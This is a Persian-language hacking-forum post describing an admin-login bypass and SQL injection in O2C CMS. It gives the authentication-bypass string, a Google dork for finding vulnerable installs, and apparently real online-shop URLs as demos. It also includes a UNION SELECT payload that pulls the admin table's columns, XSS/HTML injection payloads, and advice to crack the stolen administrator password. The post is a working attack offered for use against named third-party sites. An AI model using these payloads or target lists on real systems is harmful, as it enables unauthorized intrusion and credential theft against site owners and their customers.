انجمن تیم امنیتی ایران سایبر

O2c Cms Admin Bypass Vulnerability

شروع موضوع توسط RedNofoZi ‏12/7/18 در انجمن Web Application Exploits

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
برچسب ها:
  1. RedNofoZi
    عضو انجمن

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/6/18
    ارسال ها:
    130
    تشکر شده:
    552
    شغل:
    blAck h3t
    محل سکونت:
    win 32
    Name:
    saeid
    Main os:
    Kali
    Now what do we have?
    HTML:
    Now what do we have?
    WE HAVE
    
    # From Title : O2C cms admin bypass Vulnerability
    # To Title : O2C cms sql injection in administrator.
    # by rednofozi
    # Tested on: Windows, and many variations of linux.
    # Vendor Homepage: iran-cyber.net
    # google dork: intext:"powered by O2C"
    # Discovered by: https://iran-cyber.net/forums/members/saeidkhan.4255
    
    # Vulnerability
    
    Now, previously reading up on exploits I came across the o2c cms admin bypass.
    Login with: '=' 'or' and '=' 'or' as user and password.
    Then go to any section, click on edit a field; And you will get something like this:
    http://bandung-onlineshop.com/admin/category.php?act=edit&id=11'
    http://www.endiraalda.com/admin/shop.php?act=edit&id=35'
    
    # Error:
    
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/endldcom/public_html/admin/modules/org.distributor.inc.php on line 298
    
    # Review:
    
    After successfully expoloiting the vulnerability, I come up with tbladmin in the database.
    tbladmin contains the username and password for the administrator as you should well know.
    When you get it? Crack the password, and you no longer have the need for '=' 'or' and '=' 'or'
    
    # Demos:
    
    http://www.endiraalda.com/admin/distributor.php?act=edit&id=39'
    http://bandung-onlineshop.com/admin/category.php?act=edit&id=11
    
    # Other exploitable points in these sites:
    SQL Injection: http://bandung-onlineshop.com/product.php?idc=11'
    http://bandung-onlineshop.com/search.php (In search field, there is XSS & HTML Injection; Try putting this in it: <font color="red"><h1>@RapidDisclosure<img src="http://i59.tinypic.com/33ws84x.jpg"> )
    HTML Injection/XSS & SQL Injection: http://www.endiraalda.com/product.php?view=#&kat=-1 and 1=2 union all select 1,database(),group_concat(column_name) from information_schema.columns where table_name=0x74626c5f61646d696e-- <font color="red"><p+align="center">@RapidDisclosure</p><img src="http://media.bestofmicro.com/J/K/399872/gallery/binary-eyes-shst-130906_w_500.jpg">
    
    # Rednofozi iran cyber team welove sistan[/HTML
    tnx to :root3r @MOHAMAD-NOFOZI @JOK3R@ Ruiner​
    O
     
    آخرین ویرایش: ‏15/7/18
    F4LL3N، blackops، BlackRoot و 2 نفر دیگر از این ارسال تشکر کرده اند.
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .